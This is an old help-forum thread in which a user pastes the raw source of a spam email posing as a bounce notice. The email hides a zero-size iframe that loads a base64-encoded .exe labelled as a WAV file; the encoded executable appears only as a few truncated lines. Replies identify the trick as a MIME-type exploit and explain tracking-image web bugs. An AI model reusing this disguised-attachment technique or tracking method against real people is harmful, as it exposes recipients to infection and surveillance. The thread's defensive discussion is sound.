Caught a virus/worm?

[Stefan Jaeger]

Hi,

i am searching for some advice.

I am using netscape 7.0 as mail-client.

Today i recived an spam email, i've read unfortunable.

No attachment was indicated and so i don't have consciously executed
one.

But the mail's sourcecode shows an attachment, linked with some
embedded html-code contended in the email like this:

-----------
From: inet email service <[email protected]>
Subject:
To: net user <[email protected]>
Message-id: <[email protected]>
MIME-version: 1.0
Content-type: multipart/alternative;
boundary="Boundary_(ID_wpznqumvvXFjV2jODCZM1w)"


--Boundary_(ID_wpznqumvvXFjV2jODCZM1w)
Content-type: text/html
Content-transfer-encoding: 7BIT

<HTML>
<HEAD></HEAD>
<BODY>
<iframe src="cid:zslobikmvfr" height=0 width=0></iframe>
<BR><BR><BR>Undeliverable to <B>[email protected]</B>
<BR><BR><BR>Message follows:<BR><BR><BR><BR>
</BODY></HTML>

--Boundary_(ID_wpznqumvvXFjV2jODCZM1w)
Content-id: <zslobikmvfr>
Content-type: audio/x-wav; name=cvafsxci.exe
Content-transfer-encoding: base64
Content-disposition: attachment; filename=cvafsxci.exe

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAB+i6hSOurGATrqxgE66sYBQfbKATvqxgG59sgBLerGAdL1zAEA6sYBWPXV
ASvqxgE66scBnurGAdL1zQEx6sYBguzAATvqxgFSaWNoOurGAQAAAAAAAAAAUEUAAEwBBABwy2E/
AAAAAAAAAADgAA8BCwEGAADQAAAAQAEAAAAAAIWuAAAAEAAAAOAAAAAAQAAAEAAAABAAAAQAAAAA....
-------------

Up to now nothing happens, updated viusscanner don't found anything;
but i didn't restart the maschine yet .

Anyone, who could identify that mechanism?

Does netscape execute that html iframe-order?

Thx

Stefan

 

[FromTheRafters]

Hi,

i am searching for some advice.

I am using netscape 7.0 as mail-client.

Today i recived an spam email, i've read unfortunable.

No attachment was indicated and so i don't have consciously executed
one.

But the mail's sourcecode shows an attachment, linked with some
embedded html-code contended in the email like this:
[snip]

<iframe src="cid:zslobikmvfr" height=0 width=0></iframe>
[snip]

Content-id: <zslobikmvfr>
Content-type: audio/x-wav; name=cvafsxci.exe
Content-transfer-encoding: base64
Content-disposition: attachment; filename=cvafsxci.exe
[snip]

Up to now nothing happens, updated viusscanner don't found anything;
but i didn't restart the maschine yet .

Anyone, who could identify that mechanism?

"Incorrect MIME type exploit" (many incorrectly call it the "iframe exploit")

Does netscape execute that html iframe-order?

IFrame, yes. Exploit, no.....so malware, no.

 

[Jafar]

Does netscape execute that html iframe-order?

As far as I know NS won't execute the .exe. One way to be sure about things
is to disable .html mails in NS itself. This will also stop spammers from
embedding invisible grapics files which report back that your email address
is valid.

Jafar

 

[Stefan Jaeger]

As far as I know NS won't execute the .exe. One way to be sure about things
is to disable .html mails in NS itself. This will also stop spammers from
embedding invisible grapics files which report back that your email address
is valid.

Jafar

Done.

Thank you, Jafar and thank you, FromTheRafters.

Stefan

 

[Jafar]

Thank you, Jafar and thank you, FromTheRafters.

Stefan

You're welcome

Jafar

 

[charles]

As far as I know NS won't execute the .exe. One way to be sure about things
is to disable .html mails in NS itself. This will also stop spammers from
embedding invisible grapics files which report back that your email address
is valid.

Would you elaborate on the above please. How do the embedded graphics
report back address info? I just don't understand how that would be
done.

Thanks for the info.

 

[Jafar]

Would you elaborate on the above please. How do the embedded graphics
report back address info? I just don't understand how that would be
done.

Thanks for the info.

I'm not sure of the specifics but some html emails can contain a transparent
graphic that downloads from a server and reports back that the email
address is valid as the email has been opened. Don't ask me exactly how as
I'm not a coder. We'll not since the good old days of the C64

Jafar

 

[Rick]

Would you elaborate on the above please. How do the embedded graphics
report back address info? I just don't understand how that would be
done.

It's pretty simple. The image is embedded into the HTML email with a
unique URL. Ever seen a URL that looks like "http://xyz.com/image.jpg?
R3aaC6" ? The key is in the random apearing letters after the ? embedded
within the URL. That URL will resolve to the "image.jpg" file regardless
of those random characters but those random characters will be read and
stored by the server that is serving that image.jpg file.

The spammer simply builds a database of email addresses and includes a
field that contains a unique series of random appearing characters (a
simple six character string using upper/lower case letters and numbers
provides over 56 billion unique strings). They can then send out spam to
each address in the database and "mark" the URL to the image file with
that email addresses unique identifier. Whenever a recipient opens that
email and views that image file, the file is requested from the server
that is hosting it. That request will include the unique identifier which
can in turn be harvested easily from the server logs.

 

[FromTheRafters]

Would you elaborate on the above please. How do the embedded graphics
report back address info? I just don't understand how that would be
done.

Known as a "web bug".

http://www.eff.org/Privacy/Marketing/web_bug.html

 

[charles]

It's pretty simple. The image is embedded into the HTML email with a
unique URL. Ever seen a URL that looks like "http://xyz.com/image.jpg?
R3aaC6" ? The key is in the random apearing letters after the ? embedded
within the URL. That URL will resolve to the "image.jpg" file regardless
of those random characters but those random characters will be read and
stored by the server that is serving that image.jpg file.

The spammer simply builds a database of email addresses and includes a
field that contains a unique series of random appearing characters (a
simple six character string using upper/lower case letters and numbers
provides over 56 billion unique strings). They can then send out spam to
each address in the database and "mark" the URL to the image file with
that email addresses unique identifier. Whenever a recipient opens that
email and views that image file, the file is requested from the server
that is hosting it. That request will include the unique identifier which
can in turn be harvested easily from the server logs.

Thanks for the info. I knew that the links in these emails contained
identifiers but I never realized that the render itself would flag the
receipt.

Though I mostly use just text I've gotten used to more and more stuff
that comes through conveniently in html. Have to figure some alternative
than just disabling it completely.

 

[Barry]

Thanks for the info. I knew that the links in these emails contained
identifiers but I never realized that the render itself would flag the
receipt.

Though I mostly use just text I've gotten used to more and more stuff
that comes through conveniently in html. Have to figure some alternative
than just disabling it completely.

The e-mail program Pegasus which is a freebie, flags up messages which
have 'lazy HTML' in them instead of just displaying them. I think it is
a super program even if it does look a little dated.

 

[Rick]

The e-mail program Pegasus which is a freebie, flags up messages which
have 'lazy HTML' in them instead of just displaying them. I think it
is a super program even if it does look a little dated.

For the last couple of years I've been using Poco which has three
buttons at the top of the preview pane (and child window if emails are
opened that way) for dealing with that sort of stuff. One of them
specifically turns on/off image downloading. A second button "sanitizes"
the email to block all HTML calls to any object(s) (images,
CSS/javascript files, embedded objects, etc.) which is/are not included
inside of the email itself. It leaves the text and basic HTML formatting
intact as long as it is included within the email itself (instead of in
an external CSS file). The third button strips all HTML from the email
and displays straight text only.

I generally just leave the "sanitize" button turned on and block all
externally referenced objects (including images). If the email is from a
trusted source, it's a simple matter to click on the button and display
the email as its sender intended. If it's not from a trusted source then
it's far more likely to be tossed in the trash than anything else. I'm
busy enough as it is without wanting to delve into any of this
unsolicited crap that pours in.

 

[charles]

<snip>

I've used the Mozilla email client for a long time and have been pretty
satisfied with it. I notice that in one of the extensions for it,
MozTweak, there are options to render html optionally using
blacklist/whitelists.

That seems a reasonable way to go. I don't know how to set it up but
will look into and post if I find anything useful.